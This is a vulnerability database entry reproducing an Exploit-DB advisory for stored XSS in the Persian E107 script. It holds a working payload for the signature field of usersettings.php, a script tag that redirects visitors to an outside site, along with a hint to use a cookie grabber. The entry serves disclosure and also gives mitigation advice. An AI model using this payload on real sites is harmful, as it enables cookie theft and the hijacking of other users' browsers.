Persian E107 XSS Vulnerability

vendor:

Persian E107

by:

indoushka

N/A

CVSS

N/A

XSS

Unknown

CWE

Product Name: Persian E107

Affected Version From: Unknown

Affected Version To: Unknown

Patch Exists: NO

Related CWE:

CPE: Unknown

Metasploit:

Other Scripts:

Platforms Tested: Windows SP2 Français

Unknown

Persian E107 XSS Vulnerability

The Persian E107 script is vulnerable to XSS. An attacker can exploit this vulnerability by registering on the website and then going to the usersettings.php page. They can then edit their signature and insert malicious code, such as a script that redirects users to a different website. This can be used to steal cookies or perform other malicious actions.

Mitigation:

To mitigate this vulnerability, website administrators should implement input validation and sanitization techniques to prevent the execution of malicious code. They should also regularly update the script to the latest version, as the vendor may have released a patch to fix this issue.

Source

Exploit-DB raw data:

========================================================================================                  
| # Title    : Persian E107 XSS Vulnerability            
| # Author   : indoushka                                                               
| # email    : indoushka@dgsn.dz                                                   
| # Home     : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860)                                                                              |
| # Web Site : www.iqs3cur1ty.com/vb                                                                                                                                   
| # Script   : Powered By Persian E107 BY Iranscripts.Com | Sponsor : MehrHost.Com     
| # Tested on: windows SP2 Français V.(Pnx2 2.0)       
| # Bug      : XSS                                                                     
======================      Exploit By indoushka       =================================
 # Exploit  : 
 
 1- After register go to http://127.0.0.1/Persian/usersettings.php 
 
 2- Edit your Signature Put this code or other's :
 
 ">"">>>><script>location="http://www.arab-blackhat.co.cc"</script>"""">
 
 use coockie Graber or what you wont
 
Dz-Ghost Team ===== Saoucha * Star08 * Redda * theblind74 * XproratiX * onurozkan * n2n * Meher Assel ====================
Greetz : inj3ct0r Team 
all my friend :
His0k4 * Hussin-X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc)
Stake (www.v4-team.com) * r1z (www.sec-r1z.com) * D4NB4R * www.alkrsan.net * MR.SoOoFe * ThE g0bL!N
------------------------------------------------------------------------------------------------------------------------